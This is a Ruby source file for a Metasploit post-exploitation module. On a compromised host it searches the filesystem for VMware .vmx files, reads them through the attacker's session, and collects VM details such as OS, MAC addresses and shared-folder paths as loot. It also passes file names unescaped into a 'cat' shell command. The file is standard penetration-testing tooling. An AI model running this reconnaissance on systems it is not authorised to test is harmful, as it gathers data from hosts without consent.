metasploit-framework/modules/post/multi/gather/find_vmx.rb

134 lines
3.4 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/file'
require 'yaml'
class Metasploit3 < Msf::Post
include Msf::Post::File
def initialize(info={})
super( update_info(info,
'Name' => 'Multi Gather VMWare VM Identification',
'Description' => %q{
This module will attempt to find any VMWare virtual machines stored on the target.
},
'License' => MSF_LICENSE,
'Author' => ['theLightCosine'],
'Platform' => ['unix', 'bsd', 'linux', 'osx', 'win'],
'SessionTypes' => ['shell', 'meterpreter' ]
))
end
def run
if session_has_search_ext
vms = meterp_search
elsif session.platform =~ /unix|linux|bsd|osx/
vms = nix_shell_search
end
report_vms(vms) if vms
end
def report_vms(vms)
output = "VMWare Virtual Machines\n"
output << "--------------------------------\n"
vms.each do |vm|
next if vm.empty?
output << "Name: #{vm['name']}\n"
output << "Virtual CPUs: #{vm['cpus']}\n"
output << "Memory: #{vm['memsize']}\n"
output << "Operating System: #{vm['os']}\n"
output << "Network Type: #{vm['eth_type']}\n"
output << "MAC Address: #{vm['mac']}\n"
output << "Shared Folders:\n"
vm['SharedFolders'].each do |folder|
output << "\tHost Location: #{folder}\n"
end
output << "\n"
end
print_good output
store_loot('vmware_vms', "text/plain", session, output, "vmware_vms.txt", "VMWare Virtual Machines")
end
def nix_shell_search
vms = []
res = session.shell_command('find / -name "*.vmx" -type f -print 2>/dev/null')
res.each_line do |filename|
next unless filename.start_with? '/'
begin
parse = session.shell_command("cat #{filename}")
vms << parse_vmx(parse,filename)
rescue
print_error "Could not read #{filename} properly"
end
end
return vms
end
def meterp_search
vms = []
res = session.fs.file.search(nil, "*.vmx", true, -1)
res.each do |vmx|
filename = "#{vmx['path']}\\#{vmx['name']}"
next if filename.end_with? ".vmxf"
begin
config = client.fs.file.new(filename,'r')
parse = config.read
vms << parse_vmx(parse,filename)
rescue
print_error "Could not read #{filename} properly"
end
end
return vms
end
def parse_vmx(vmx_data, filename)
vm= {}
unless vmx_data.nil? or vmx_data.empty?
vm['SharedFolders'] = []
vmx_data.each_line do |line|
data = line.split("=")
vm['path'] = filename
case data[0]
when "memsize "
vm['memsize'] = data[1].gsub!("\"",'').lstrip.chomp
when "displayName "
vm['name'] = data[1].gsub!("\"",'').lstrip.chomp
when "guestOS "
vm['os'] = data[1].gsub!("\"",'').lstrip.chomp
when "ethernet0.connectionType "
vm['eth_type'] = data[1].gsub!("\"",'').lstrip.chomp
when "ethernet0.generatedAddress "
vm['mac'] = data[1].gsub!("\"",'').lstrip.chomp
when "numvcpus "
vm['cpus'] = data[1].gsub!("\"",'').lstrip.chomp
when "sharedFolder0.hostPath "
vm['SharedFolders'] << data[1].gsub!("\"",'').lstrip.chomp
end
end
vm['cpus'] ||= "1"
end
return vm
end
def session_has_search_ext
begin
return !!(session.fs and session.fs.file)
rescue NoMethodError
return false
end
end
end